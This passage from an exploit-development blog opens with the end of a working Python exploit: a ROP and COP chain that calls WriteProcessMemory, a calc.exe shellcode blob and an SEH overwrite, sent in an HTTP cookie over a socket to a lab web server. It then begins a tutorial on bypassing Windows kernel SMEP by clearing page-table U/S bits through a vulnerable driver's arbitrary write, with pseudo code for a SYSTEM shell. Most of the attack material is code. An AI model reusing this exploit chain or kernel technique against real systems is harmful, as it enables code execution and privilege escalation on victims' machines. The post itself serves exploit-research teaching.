crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)		# add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)		# Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)		# Return address parameter placeholder (where function will jump to after execution- which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)		# hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)		# lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0x11111111)		# lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)		# nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)		# lpNumberOfBytesWritten = writeable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)		# pop esi ; add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)		# Negative distance from EAX to the shellcode (approximate, lands in the NOPs)
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)		# sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)		# mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)		# pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)		# add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)		# xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)		# mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)		# sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder

crash += struct.pack('<L', 0x1002248c)		# mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)		# mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory is a negative distance of 0xfffffd2d bytes from kernel32!GetStartupInfoA (which is currently in the parameter placeholder)
# Popping 0xfffffd2d into EBX (which will be transferred into EDX. After the value is in EDX, it will be subtracted from EAX)

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)		# xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)		# pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)		# Negative distance to kernel32!WriteProcessMemory from kernel32!GetStartupInfoA

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)		# add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)		# Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)		# sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget

# Writing kernel32!WriteProcessMemory address to kernel32!WriteProcessMemory parameter placeholder

# Gadget to overwrite kernel32!WriteProcessMemory parameter placeholder will do so at an offset of ECX + 0x8. Compensating for that now
# First, decrementing ECX by 0x8
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)		# mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# The goal now is to load the address pointing to kernel32!WriteProcessMemory in ESP
# ECX contains an address + 0x8 bytes behind the kernel32!WriteProcessMemory pointer on the stack
# Increasing ECX by 8 bytes, moving it into EAX, and then exchanging EAX with ESP to fire off the ROP chain!
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)		# mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)		# xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)


# NOPs before shellcode
crash += "\x90" * 230

# calc.exe
# 195 bytes

crash += ("\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
"\x52\xff\xd0")

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only- no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)		# add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

iF wE dIsAbLe cAlC wE wIlL mItIgAtE aLl tHe zEro dAyS

Conclusion

Had to think outside the box with a few of the COP gadgets, but overall this was very fun! Hopefully this was informative and helped out anyone looking to stay away from VirtualProtect() or VirtualAlloc().

Peace, love, and positivity :-)

Exploit Development: Leveraging Page Table Entries for Windows Kernel Exploitation

2 May 2020 at 00:00

Introduction

Taking the prerequisite knowledge from my last blog post, let’s talk about additional ways to bypass SMEP other than flipping the 20th bit of the CR4 register, or circumventing SMEP altogether by bypassing NX in the kernel! This blog post in particular will leverage page table entry control bits to bypass these kernel mode mitigations. It will also leverage an additional vulnerability, an arbitrary read, to bypass page table randomization along the way.

Before We Begin

Morten Schenk of Offensive Security has done a lot of the leg work for shedding light on this topic to the public, namely at DefCon 25 and Black Hat 2017.

Although there has been some AMAZING research on this, I have not seen much in the way of practical blog posts showcasing this technique in the wild (that is, taking an exploit start to finish leveraging this technique in a blog post). Most of the research surrounding this topic, although absolutely brilliant, only explains how these mitigation bypasses work. This led to some issues for me when I started applying this research into actual exploitation, as I only had theory to go off of.

Since I had some trouble implementing said research into a practical example, I’m writing this blog post in hopes it will aid those looking for more detail on how to leverage these mitigation bypasses in a practical manner.

This blog post is going to utilize the HackSysExtreme vulnerable kernel driver to outline bypassing SMEP and bypassing NX in the kernel. The vulnerability class will be an arbitrary read/write primitive, which can write one QWORD to kernel mode memory per IOCTL routine.

Thank you to Ashfaq of HackSysTeam for this driver!

In addition to said information, these techniques will be utilized on a Windows 10 64-bit RS1 build. This is because Windows 10 RS2 has kernel Control Flow Guard (kCFG) enabled by default, which is beyond the scope of this post. This post simply aims to show the techniques used in today’s “modern exploitation era” to bypass SMEP or NX in kernel mode memory.

Why Go to the Mountain, If You Can Bring the Mountain to You?

The adage in the title of this section comes from Spencer Pratt’s WriteProcessMemory() white paper about bypassing DEP. It is extremely applicable to the method of bypassing SMEP through PTEs.

Let’s start with some pseudo code!

# Allocating user mode code
payload = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(shellcode)),            # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

---------------------------------------------------------

# Grabbing HalDispatchTable + 0x8 address
HalDispatchTable+0x8 = NTBASE + 0xFFFFFF

# Writing payload to HalDispatchTable + 0x8
www.What = payload
www.Where = HalDispatchTable + 0x8

---------------------------------------------------------

# Spawning SYSTEM shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!!!!"
os.system("cmd.exe /K cd C:\\")

Note, the above code is syntactically incorrect, but it is there nonetheless to help us understand what is going on.

Also, before moving on, write-what-where = arbitrary memory overwrite = arbitrary write primitive.

Carrying on, the above pseudo code snippet allocates virtual memory in user mode via VirtualAlloc(). Then, utilizing the write-what-where vulnerability in the kernel mode driver, the shellcode’s virtual address (residing in user mode) gets written to nt!HalDispatchTable+0x8 (residing in kernel mode), which is a very common technique to use in an arbitrary memory overwrite situation.

Please refer to my last post on how this technique works.

As it stands now, execution of this code will result in an ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY Bug Check. This Bug Check is indicative of SMEP kicking in.

Letting the code execute, we can see this is the case.

Here, we can clearly see our shellcode has been allocated at 0x2620000

SMEP kicks in, and we can see the offending address is that of our user mode shellcode (Arg2 of PTE contents is highlighted as well. We will circle back to this in a moment).

Recall, from a previous blog of mine, that SMEP kicks in whenever code that resides in a user mode page (CPL 3 code = user mode code) is executed while the CPU is running in the context of CPL 0 (kernel mode).

SMEP is triggered in this case, as we are attempting to access the shellcode’s virtual address in user mode from nt!HalDispatchTable+0x8, which is in kernel mode.

But HOW is SMEP implemented is the real question.

SMEP is mandated/enabled through the OS via the 20th bit of the CR4 control register.

The 20th bit in the above image refers to the 1 in the beginning of CR4 register’s value of 0x170678, meaning SMEP is enabled on this system globally.
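As a quick sanity check of the statement above, here is a minimal sketch that tests bit 20 of the CR4 value from the screenshot. The helper name smep_enabled is made up purely for illustration; only the value 0x170678 comes from this post.

```python
# Bit 20 of CR4 (counting from bit 0) is the SMEP enable bit
CR4_SMEP_BIT = 20

def smep_enabled(cr4_value):
    """Hypothetical helper: True if the SMEP bit is set in a raw CR4 value."""
    return bool((cr4_value >> CR4_SMEP_BIT) & 1)

# CR4 value taken from the WinDbg output above
cr4 = 0x170678
print("[+] SMEP enabled: {0}".format(smep_enabled(cr4)))

# Clearing bit 20 is what the "flip CR4" style of bypass does
cr4_smep_off = cr4 & ~(1 << CR4_SMEP_BIT)
print("[+] CR4 with SMEP cleared: {0:x}".format(cr4_smep_off))
```

The leading 1 in 0x170678 is exactly that bit, which is why the value drops to 0x70678 once it is cleared.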

However, SMEP is ENFORCED on a per memory page basis, via the U/S PTE control bit. This is what we are going to shift our focus to in this post.

Alex Ionescu gave a talk at Infiltrate 2015 about the implementation of SMEP on a per page basis.

Citing his slides, he explains that Intel has the following to say about SMEP enforcement on a per page basis.

“Any page level marked as supervisor (U/S=0) will result in treatment as supervisor for SMEP enforcement.”

Let’s take a look at the output of !pte in WinDbg of our user mode shellcode page to make sense of all of this!

What Intel means by their statement in Alex’s talk is that only ONE of the paging structure entries for a page (the page table entry, for example) needs to be set to kernel in order for SMEP to not trigger. We do not need all 4 entries to be supervisor (kernel) mode!

This is wonderful for us, from an exploit development standpoint- as this GREATLY reduces our workload (we will see why shortly)!
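To make Intel’s statement a bit more concrete, here is a toy model (not real paging code) of how the U/S bits across the four paging levels combine. The function names and the tuple layout are assumptions made up for this illustration.

```python
def treated_as_user(us_bits):
    """us_bits holds the U/S bit (1 = user, 0 = supervisor) of the
    PML4E, PDPTE, PDE and PTE that map a page, in that order.

    The page only counts as user mode if EVERY level says user.
    """
    return all(bit == 1 for bit in us_bits)

def smep_blocks_kernel_fetch(us_bits):
    """With SMEP on, CPL 0 may not fetch instructions from a user mode page."""
    return treated_as_user(us_bits)

# All four levels marked user: SMEP fires when the kernel jumps here
print(smep_blocks_kernel_fetch((1, 1, 1, 1)))

# Only the PTE flipped to supervisor: the page is treated as supervisor
print(smep_blocks_kernel_fetch((1, 1, 1, 0)))
```

This is why touching a single entry is enough: one supervisor bit anywhere in the walk changes how the whole page is treated.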

Let’s learn how we can leverage this new knowledge, by first examining the current PTE control bits of our shellcode page:

  1. D- The “dirty” bit has been set, meaning a write to this address has occurred (KERNELBASE!VirtualAlloc()).
  2. A- The “access” bit has been set, meaning this address has been referenced at some point.
  3. U- The “user” bit has been set here. When the memory management unit reads in this address, it recognizes it as a user mode address. When this bit is 1, the page is user mode. When this bit is clear, the page is kernel mode.
  4. W- The “write” bit has been set here, meaning this memory page is writeable.
  5. E- The “executable” bit has been set here, meaning this memory page is executable.
  6. V- The “valid” bit is set here, meaning that the PTE is a valid PTE.

Notice that most of these control bits were set with our call earlier to KERNELBASE!VirtualAlloc() in the pseudo code snippet via the function’s arguments of flAllocationType and flProtect.
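The control bits listed above can also be decoded by hand from a raw PTE value. The sketch below uses the standard x64 PTE bit positions; the helper name decode_pte is made up, and the sample value is the PTE quoted later in this post, used here only as stand-in data.

```python
# Bit positions in an x64 page table entry
PTE_VALID    = 1 << 0    # V
PTE_WRITE    = 1 << 1    # W
PTE_USER     = 1 << 2    # U (clear = supervisor/kernel)
PTE_ACCESSED = 1 << 5    # A
PTE_DIRTY    = 1 << 6    # D
PTE_NX       = 1 << 63   # no-execute; "E" is shown when this bit is clear

def decode_pte(pte):
    """Hypothetical helper: map a raw PTE value to the flags !pte prints."""
    return {
        "D": bool(pte & PTE_DIRTY),
        "A": bool(pte & PTE_ACCESSED),
        "U": bool(pte & PTE_USER),
        "W": bool(pte & PTE_WRITE),
        "E": not (pte & PTE_NX),
        "V": bool(pte & PTE_VALID),
    }

# Sample PTE value (stand-in data)
sample_pte = 0x2000000046b0f867
flags = decode_pte(sample_pte)
for name in "DAUWEV":
    print("{0}: {1}".format(name, flags[name]))
```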

Where Do We Go From Here?

Let’s shift our focus to the PTE entry from the !pte command output in the last screenshot. We can see that our entry is that of a user mode page, from the U/S bit being set. However, what if we cleared this bit out?

If the U/S bit is set to 0, the page should become a kernel mode page, based on the aforementioned information. Let’s investigate this in WinDbg.

Rebooting our machine, we reallocate our shellcode in user mode.

The above image performs the following actions:

  1. Shows our shellcode in a user mode allocation at the virtual address 0xc60000
  2. Shows the current PTE and control bits for our shellcode memory page
  3. Uses ep in WinDbg to overwrite the pointer at 0xFFFFF98000006300 (this is the address of our PTE. When dereferenced, it contains the actual PTE control bits)
  4. Clears the PTE control bit for U/S by subtracting 4 from the PTE control bit contents.

    Note, I found this to be the correct value to clear the U/S bit through trial and error.
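The subtraction works because U/S is bit 2 of the PTE, which has a value of 4. A slightly more defensive way to express the same idea is a bitwise mask, since subtracting 4 from a PTE whose U/S bit is already clear would corrupt other bits. A minimal sketch, with a made-up helper name and the PTE value quoted later in this post as stand-in data:

```python
PTE_USER_BIT = 0x4   # U/S is bit 2 of the PTE

def clear_user_bit(pte):
    """Hypothetical helper: return the PTE with U/S cleared (supervisor)."""
    return pte & ~PTE_USER_BIT

user_pte = 0x2000000046b0f867          # stand-in user mode PTE
kernel_pte = clear_user_bit(user_pte)

print("[+] User mode PTE:   {0:016x}".format(user_pte))
print("[+] Kernel mode PTE: {0:016x}".format(kernel_pte))

# Applying the mask a second time changes nothing, unlike a second "- 4"
print(clear_user_bit(kernel_pte) == kernel_pte)
```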

After the U/S bit is cleared out, our exploit continues by overwriting nt!HalDispatchTable+0x8 with the pointer to our shellcode.

The exploit continues, with a call to nt!KeQueryIntervalProfile(), which in turn, calls nt!HalDispatchTable+0x8

Stepping into the call qword ptr [nt!HalDispatchTable+0x8] instruction, we have hit our shellcode address and it has been loaded into RIP!
